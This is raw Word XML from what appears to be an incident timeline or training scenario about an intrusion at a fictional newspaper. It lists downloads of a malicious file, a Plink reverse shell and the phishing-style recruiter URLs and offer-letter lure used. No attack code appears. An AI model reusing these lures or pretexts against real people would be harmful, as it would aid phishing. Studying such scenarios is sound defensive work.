        <w:t>2024-01-10T08:55:17Z</w:t>
      </w:r>
      <w:r>
        <w:t>: Ronnie’s host downloaded a suspicious file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB01F57" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="00491E76">
      <w:r w:rsidRPr="00D74C9E">
        <w:t>2024-01-05T11:55:22Z</w:t>
      </w:r>
      <w:r>
        <w:t>: Plink reverse shell established on Sonia’s host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF04A7" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="00491E76">
      <w:r w:rsidRPr="000B755A">
        <w:t xml:space="preserve">2024-01-05T10:24:32Z.: The malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B755A">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B755A">
        <w:t xml:space="preserve"> file was downloaded on Sonia’s host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64524F69" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="00491E76">
      <w:r w:rsidRPr="003336DD">
        <w:t>2024-01-05T10:24:04Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Sonia downloaded a suspicious file: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B755A">
        <w:t>Valdorian_Times_Editorial_Offer_Letter.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7DF2BE" w14:textId="44BD59B1" w:rsidR="00491E76" w:rsidRPr="002E5AB0" w:rsidRDefault="00491E76" w:rsidP="002E5AB0"/>
    <w:p w14:paraId="593AE040" w14:textId="77777777" w:rsidR="002E5AB0" w:rsidRDefault="002E5AB0" w:rsidP="00495287"/>
    <w:sectPr w:rsidR="002E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7"/>
    <w:rsid w:val="00006FCF"/>
    <w:rsid w:val="00057D6C"/>
    <w:rsid w:val="00081F55"/>
    <w:rsid w:val="000D5C9B"/>
    <w:rsid w:val="001018E6"/>
    <w:rsid w:val="001110EC"/>
    <w:rsid w:val="00183E2B"/>
    <w:rsid w:val="001D00C3"/>
    <w:rsid w:val="002E5AB0"/>
    <w:rsid w:val="003336DD"/>
    <w:rsid w:val="00367481"/>
    <w:rsid w:val="003E6D5E"/>
    <w:rsid w:val="004366C0"/>
    <w:rsid w:val="0045129F"/>
    <w:rsid w:val="004569FD"/>
    <w:rsid w:val="00491E76"/>
    <w:rsid w:val="00495287"/>
    <w:rsid w:val="004954CA"/>
    <w:rsid w:val="004F2DED"/>
    <w:rsid w:val="004F3B4C"/>
    <w:rsid w:val="005705BE"/>
    <w:rsid w:val="005C4865"/>
    <w:rsid w:val="005C63D6"/>
    <w:rsid w:val="00677D2C"/>
    <w:rsid w:val="00725AAC"/>
    <w:rsid w:val="0074077C"/>
    <w:rsid w:val="007A689D"/>
    <w:rsid w:val="007D734D"/>
    <w:rsid w:val="00811FCB"/>
    <w:rsid w:val="00954C3F"/>
    <w:rsid w:val="00973C80"/>
    <w:rsid w:val="0098575E"/>
    <w:rsid w:val="00A00315"/>
    <w:rsid w:val="00A52938"/>
    <w:rsid w:val="00AC2A15"/>
    <w:rsid w:val="00B2453A"/>
    <w:rsid w:val="00BF58F6"/>
    <w:rsid w:val="00D74C9E"/>
    <w:rsid w:val="00DC0DD5"/>
    <w:rsid w:val="00DC5217"/>
    <w:rsid w:val="00DD7808"/>
    <w:rsid w:val="00E85826"/>
    <w:rsid w:val="00EA47BC"/>
    <w:rsid w:val="00FA5B9C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A3D7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{56FFFBFA-5F9B-49B9-979D-F6967786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7C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0049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2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0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otionrecruit.org/share/Editorial_J0b_Openings_2024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aldorias_best_recruiter@gmail.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hire-recruit.org/files/fakescandal/2024/fakestory.doc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motion-job.org/share/Editorial_J0b_Openings_2024.doc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mailto:ronnie_mclovin@valdoriantimes.news" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:newspaper_jobs@gmail.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:clark_kent@valdoriantimes.news" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:sonia_gose@valdoriantimes.news" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now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Lundy, Devin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Devin Lundy</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-17T18:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-05T16:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>